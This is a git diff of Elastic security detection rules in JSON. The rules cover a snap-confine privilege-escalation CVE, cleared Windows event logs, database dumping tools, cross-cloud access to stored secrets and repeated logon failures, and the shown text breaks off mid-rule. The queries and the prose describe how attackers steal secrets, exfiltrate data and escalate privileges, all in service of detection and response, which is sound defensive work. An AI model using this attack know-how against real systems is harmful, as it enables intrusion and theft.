00000000000..2a35be88a72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/44cb1d8a-1922-4fc0-a00f-36c1caf57393_1.json @@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects non-root file creation within \"/tmp/.snap\" or its host backing path \"/tmp/snap-private-tmp/*/tmp/.snap\", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the \"/tmp/.snap\" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of \".snap\" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential snap-confine Privilege Escalation via CVE-2026-3888", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential snap-confine Privilege Escalation via CVE-2026-3888\n\nThis rule flags non-root creation of files under temporary snap sandbox directories that snap-confine should prepare as root, which can expose an attempt to abuse CVE-2026-3888 for local root access. A common pattern is an unprivileged user waiting for stale `/tmp/.snap` content to be removed, recreating that path, and dropping crafted libraries or configuration so the next snap launch pulls attacker-controlled files into the sandbox setup and elevates privileges.\n\n### Possible investigation steps\n\n- Review the originating user's recent terminal, SSH, sudo, and scheduled-task activity to determine whether the file creation was part of legitimate administration or an unexpected local execution chain.\n- Inspect the affected `.snap` directory contents for crafted symlinks, shared libraries, configuration files, or path redirection artifacts that could be consumed during snap sandbox initialization.\n- Correlate the activity with nearby launches of `snap`, `snap-confine`, `snapd`, or installed snap applications and determine whether any such execution was followed by a new root-level process tree.\n- Look for evidence that `systemd-tmpfiles` or another cleanup mechanism removed the stale directory shortly before it was recreated by the unprivileged account, as this timing strongly supports CVE-2026-3888 exploitation behavior.\n- Examine post-alert host activity for signs of successful escalation such as unexpected root-owned file changes, new setuid binaries, persistence creation, credential access, or security control tampering.\n\n### False positive analysis\n\n- A user troubleshooting a failing snap application may manually create or modify files under `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap`; verify by reviewing the parent shell/process lineage and nearby `snap` or `snap-confine` executions to confirm it was interactive testing with no follow-on root activity.\n- Telemetry can occasionally attribute file creation to the invoking non-root user during normal snap sandbox initialization even though the privileged helper completes the action; verify by checking whether related `snap` or `snap-confine` events occurred at the same time and whether the final directory and files are owned by root.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network, stop any active `snap`, `snap-confine`, or suspicious root shell processes tied to the originating user, and preserve the contents of `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap` for evidence.\n- Remove attacker-controlled files, symlinks, shared libraries, and configuration placed in the recreated `.snap` paths, then delete any persistence added after the event such as unauthorized `systemd` units, `/etc/cron*` entries, `~/.ssh/authorized_keys` changes, sudoers modifications, new local accounts, or unexpected setuid-root binaries.\n- Escalate immediately to incident response and treat the host as fully compromised if you confirm a root-owned process tree descending from the unprivileged user, root-level file changes outside the temporary snap path, or tampering with `/etc/ld.so.preload`, PAM modules, or endpoint security agents.\n- Restore the host to a known-good state by rebuilding or reimaging it when privilege escalation cannot be conclusively ruled out, or otherwise replace modified system files from trusted packages, rotate credentials exposed on the system, and verify correct root ownership and permissions on snap temporary directories before reconnecting it.\n- Harden the environment by applying the vendor fix for CVE-2026-3888, updating `snapd` and related Ubuntu packages, restricting unnecessary local shell access, and increasing monitoring for non-root creation of files under `/tmp/.snap` and `/tmp/snap-private-tmp/*/tmp/.snap`.\n", + "query": "file where host.os.type == \"linux\" and event.action == \"creation\" and\nfile.path like (\"/tmp/.snap*\", \"/tmp/snap-private-tmp/*/tmp/.snap*\") and\nuser.id != \"0\"\n", + "references": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/17/cve-2026-3888-important-snap-flaw-enables-local-privilege-escalation-to-root", + "https://cdn2.qualys.com/advisory/2026/03/17/snap-confine-systemd-tmpfiles.txt" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "44cb1d8a-1922-4fc0-a00f-36c1caf57393", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "44cb1d8a-1922-4fc0-a00f-36c1caf57393_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_216.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_216.json new file mode 100644 index 00000000000..22241b8400a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_216.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Anabella Cristaldi" + ], + "description": "Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-system.system*", + "logs-windows.forwarded*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Windows Event Logs Cleared", + "note": "## Triage and analysis\n\n### Investigating Windows Event Logs Cleared\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the occurrence of clear actions on the `security` event log.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.action:(\"audit-log-cleared\" or \"Log clear\") and\n winlog.channel: (\"Security\" or \"System\")\n", + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.channel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "45ac4800-840f-414c-b221-53dd36a5aaf7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", + "Data Source: Windows System Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 216 + }, + "id": "45ac4800-840f-414c-b221-53dd36a5aaf7_216", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json b/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json deleted file mode 100644 index e184c194971..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json +++ /dev/null @@ -1,184 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects authenticated sessions accessing secret stores across multiple cloud providers from the same source address within a short period of time. Adversaries with access to compromised credentials or session tokens may attempt to retrieve secrets from services such as AWS Secrets Manager, Google Secret Manager, or Azure Key Vault in rapid succession to expand their access or exfiltrate sensitive information.", - "from": "now-9m", - "interval": "5m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Cloud Secrets Accessed by Source Address", - "note": "## Triage and analysis\n\n### Multiple Cloud Secrets Accessed by Source Address\n\nThis alert identifies a single source IP address accessing secret-management APIs across **multiple cloud providers**\n(e.g., AWS Secrets Manager, Google Secret Manager, Azure Key Vault) within a short timeframe.\nThis behavior is strongly associated with **credential theft, session hijacking, or token replay**, where an adversary\nuses stolen authenticated sessions to harvest secrets across cloud environments.\n\nUnexpected cross-cloud secret retrieval is uncommon and typically indicates automation misuse or malicious activity.\n\n### Possible investigation steps\n\n- Validate the principal\n - Identify the user, service account, workload identity, or application making the requests.\n - Confirm whether this identity is expected to operate across more than one cloud provider.\n- Review related activity\n - Look for additional alerts involving the same identity, source IP, or token over the last 24\u201348 hours.\n - Identify whether the source IP has been observed performing unusual authentication, privilege escalation,\n or reconnaissance.\n- Check application or service context\n - Determine whether any workload legitimately pulls secrets from multiple cloud providers.\n - Review deployment pipelines or integration layers that might legitimately bridge AWS, Azure, and GCP.\n- Analyze user agent and invocation patterns\n - Compare `user_agent.original` or equivalent fields against expected SDKs or automation tools.\n - Suspicious indicators include CLI tools, unknown libraries, browser user agents, or custom scripts.\n- Inspect IP reputation and origin\n - Determine whether the source IP corresponds to a managed workload (EC2, GCE, Azure VM) or an unexpected host.\n - Validate that the associated instance or host is under your control and behaving normally.\n- Review IAM permissions and accessed secrets\n - Check the policies attached to the identity.\n - Verify whether the accessed secrets are sensitive, unused, or unrelated to the identity\u2019s purpose.\n- Assess potential compromise scope\n - If compromise is suspected, enumerate other assets accessed by the same identity in the last 24 hours.\n - Look for lateral movement, privilege escalation, or abnormal API usage.\n\n### False positive analysis\n\n- Validate whether the source IP is associated with a legitimate multi-cloud orchestration tool, automation pipeline,\n or shared CI/CD system.\n- Confirm that the identity is authorized to access secrets across multiple cloud services.\n- If activity is expected, consider adding exceptions that pair account identity, source IP, and expected user agent\n to reduce noise.\n\n### Response and remediation\n\n- Initiate incident response** if the activity is unauthorized or suspicious.\n- Restrict or disable** the affected credentials or service accounts.\n- Rotate all accessed secrets** and review other secrets the identity can access.\n- Analyze systems** that may have leaked credentials, such as compromised hosts or exposed tokens.\n- Harden identity security:\n - Enforce MFA for users where applicable.\n - Reduce permissions to least privilege.\n - Review trust relationships, workload identities, and cross-cloud integrations.\n- Search for persistence mechanisms** such as newly created keys, roles, or service accounts.\n- Improve monitoring and audit visibility** by ensuring logging is enabled across all cloud environments.\n- Determine root cause** (phishing, malware, token replay, exposed credential, etc.) and close the vector to prevent recurrence.\n", - "query": "FROM logs-azure.platformlogs-*, logs-azure.activitylogs-*, logs-aws.cloudtrail-*, logs-gcp.audit-* METADATA _id, _version, _index\n| WHERE \n ( \n /* AWS Secrets Manager */ \n (event.dataset == \"aws.cloudtrail\" AND event.provider == \"secretsmanager.amazonaws.com\" AND event.action == \"GetSecretValue\") OR \n // Azure Key Vault (platform logs)\n (event.dataset == \"azure.platformlogs\" AND event.action IN (\"SecretGet\", \"KeyGet\")) or \n /* Azure Key Vault (activity logs) */ \n (event.dataset == \"azure.activitylogs\" AND azure.activitylogs.operation_name IN (\"MICROSOFT.KEYVAULT/VAULTS/SECRETS/LIST\", \"MICROSOFT.KEYVAULT/VAULTS/SECRETS/GET\")) OR \n /* Azure Managed HSM secret */ \n (event.dataset == \"azure.activitylogs\" AND azure.activitylogs.operation_name LIKE \"MICROSOFT.KEYVAULT/managedHSM/keys/*\") OR \n /* Google Secret Manager */ \n (event.dataset IN (\"googlecloud.audit\", \"gcp.audit\") AND \n event.action IN (\"google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion\", \"google.cloud.secretmanager.v1.SecretManagerService.GetSecretRequest\"))\n ) AND source.ip IS NOT NULL\n// Unified user identity (raw)\n| EVAL Esql_priv.user_id =\n COALESCE(\n client.user.id,\n aws.cloudtrail.user_identity.arn,\n azure.platformlogs.identity.claim.upn,\n NULL\n )\n// Cloud vendor label based on dataset\n| EVAL Esql.cloud_vendor = CASE(\n event.dataset == \"aws.cloudtrail\", \"aws\",\n event.dataset IN (\"azure.platformlogs\",\"azure.activitylogs\"), \"azure\",\n event.dataset IN (\"googlecloud.audit\",\"gcp.audit\"), \"gcp\",\n \"unknown\"\n )\n// Vendor+tenant label, e.g. aws:123456789012, azure:tenant, gcp:project\n| EVAL Esql.tenant_label = CASE(\n Esql.cloud_vendor == \"aws\", CONCAT(\"aws:\", cloud.account.id),\n Esql.cloud_vendor == \"azure\", CONCAT(\"azure:\", cloud.account.id),\n Esql.cloud_vendor == \"gcp\", CONCAT(\"gcp:\", cloud.account.id),\n NULL\n )\n| STATS\n // Core counts\n Esql.events_count = COUNT(*),\n Esql.vendor_count_distinct = COUNT_DISTINCT(Esql.cloud_vendor),\n // Action & data source context\n Esql.event_action_values = VALUES(event.action),\n Esql.data_source_values = VALUES(event.dataset),\n // Cloud vendor + tenant context\n Esql.cloud_vendor_values = VALUES(Esql.cloud_vendor),\n Esql.tenant_label_values = VALUES(Esql.tenant_label),\n // Hyperscaler-specific IDs\n Esql.aws_account_id_values = VALUES(CASE(Esql.cloud_vendor == \"aws\", cloud.account.id, NULL)),\n Esql.azure_tenant_id_values = VALUES(CASE(Esql.cloud_vendor == \"azure\", cloud.account.id, NULL)),\n Esql.gcp_project_id_values = VALUES(CASE(Esql.cloud_vendor == \"gcp\", cloud.account.id, NULL)),\n // Generic cloud metadata\n Esql.cloud_region_values = VALUES(cloud.region),\n Esql.cloud_service_name_values = VALUES(cloud.service.name),\n // Identity (privileged)\n Esql_priv.user_values = VALUES(Esql_priv.user_id),\n Esql_priv.client_user_id_values = VALUES(client.user.id),\n Esql_priv.aws_user_identity_arn_values = VALUES(aws.cloudtrail.user_identity.arn),\n Esql_priv.azure_upn_values = VALUES(azure.platformlogs.identity.claim.upn),\n // Namespace values\n Esql.data_stream_namespace_values = VALUES(data_stream.namespace)\n BY source.ip\n// Require multi-vendor cred-access from same source IP\n| WHERE Esql.vendor_count_distinct >= 2\n| SORT Esql.events_count DESC\n| KEEP Esql.*, Esql_priv.*, source.ip\n", - "references": [ - "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", - "https://docs.cloud.google.com/secret-manager/docs/samples/secretmanager-access-secret-version", - "https://learn.microsoft.com/en-us/azure/key-vault/secrets/about-secrets", - "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack" - ], - "related_integrations": [ - { - "package": "aws", - "version": "^4.0.0" - }, - { - "package": "gcp", - "version": "^2.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - }, - { - "integration": "cloudtrail", - "package": "aws", - "version": "^4.0.0" - }, - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "integration": "platformlogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.aws_account_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_tenant_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.cloud_region_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.cloud_service_name_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.cloud_vendor_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.data_source_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.data_stream_namespace_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_action_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.events_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.gcp_project_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.tenant_label_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.vendor_count_distinct", - "type": "long" - }, - { - "ecs": false, - "name": "Esql_priv.aws_user_identity_arn_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql_priv.azure_upn_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql_priv.client_user_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql_priv.user_values", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 73, - "rule_id": "472b4944-d810-43cf-83dc-7d080ae1b8dd", - "setup": "This multi-datasource rule relies on additional configurations from each hyperscaler.\n\n- GCP Audit: [Enable DATA_READ for the Secret Manager API service](https://docs.cloud.google.com/logging/docs/audit/configure-data-access)\n- Azure: [Enable Diagnostic Logging for the Key Vault Service](https://learn.microsoft.com/en-us/azure/key-vault/general/howto-logging?tabs=azure-cli)\n- AWS: Secrets Manager read access is automatically logged by CloudTrail.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: IAM", - "Domain: Storage", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Secrets Manager", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1555", - "name": "Credentials from Password Stores", - "reference": "https://attack.mitre.org/techniques/T1555/", - "subtechnique": [ - { - "id": "T1555.006", - "name": "Cloud Secrets Management Stores", - "reference": "https://attack.mitre.org/techniques/T1555/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "472b4944-d810-43cf-83dc-7d080ae1b8dd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1.json b/packages/security_detection_engine/kibana/security_rule/47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1.json new file mode 100644 index 00000000000..47f5f5cd4a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Database Dumping Activity", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Database Dumping Activity\n\nThis alert flags a Linux process starting a common database export tool, which matters because these utilities can quickly copy entire datasets into portable files for theft. An attacker with shell access may run mysqldump, pg_dump, or mongodump to dump customer records or application data to disk and then transfer the archive off the host over a separate network channel.\n\n### Possible investigation steps\n\n- Review the full command line, parent and ancestor process chain, and execution user to determine whether the dump was launched by approved backup automation, an administrator shell, or an unexpected process such as a web server or scripting interpreter.\n- Validate whether the account and host normally perform database backups by comparing the activity with change windows, cron or systemd timer jobs, deployment scripts, and historical executions on this and similar systems.\n- Identify any dump artifacts created around the alert by looking for new large files, archive or compression activity, staging in temporary directories, or writes to mounted shares that could indicate preparation for transfer.\n- Examine surrounding authentication and network activity for signs of compromise or exfiltration, including recent SSH or VPN access to the host, unusual database logins, and outbound connections or file transfers shortly after the dump began.\n- If the activity is not authorized, isolate the host as appropriate and scope for related activity across the environment by searching for the same user, parent process, command pattern, and follow-on transfer utilities on other systems.\n\n### False positive analysis\n\n- Scheduled backup or maintenance scripts may legitimately run pg_dump, mysqldump, or mongodump on Linux database hosts; confirm the execution user, parent process, and timing match documented cron or systemd jobs and that the output is written to the expected backup location.\n- A DBA or application administrator may manually export data for migration, troubleshooting, or upgrade validation; verify the user account, shell history or change records, and command-line options align with an approved maintenance task and that no unusual outbound transfer follows the dump.\n\n### Response and remediation\n\n- Quarantine the affected Linux host from the network except for approved management access, stop any active pg_dump, mysqldump, mariadb-dump, pg_dumpall, or mongodump activity and any follow-on compression or transfer processes, and block the account and destination used to stage the dump.\n- Remove attacker persistence by deleting unauthorized cron jobs, systemd services or timers, startup scripts, SSH authorized_keys entries, web shells, and any scripts or binaries used to create, archive, or move the database export.\n- Revoke and rotate the database credentials, local passwords, SSH keys, and API tokens exposed on the host, then review database users for newly granted backup, export, replication, or superuser privileges and disable anything not explicitly approved.\n- Restore to a known-good state by rebuilding the host or reverting from a trusted image, validating the database against clean backups, and deleting dump files, archives, and copied datasets from temporary directories, mounted shares, and storage buckets.\n- Escalate to incident response immediately if any dump file was transferred to an external server, cloud service, or user workstation, if similar dumping activity is found on other hosts, or if the attacker used a privileged administrator or database account.\n- Harden the environment by limiting dump utilities to approved backup hosts and service accounts, enforcing MFA and least privilege for administrators, restricting outbound network paths from database servers, and alerting on new dump archives or unexpected database export tool execution.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\") and\nprocess.name in (\"pg_dump\", \"pg_dumpall\", \"mysqldump\", \"mariadb-dump\", \"mongodump\")\n", + "references": [ + "https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_114.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_118.json similarity index 74% rename from packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_114.json rename to packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_118.json index e541a18589a..07e8d6bd93b 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_114.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_118.json @@ -5,16 +5,11 @@ ], "description": "Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", + "language": "esql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are 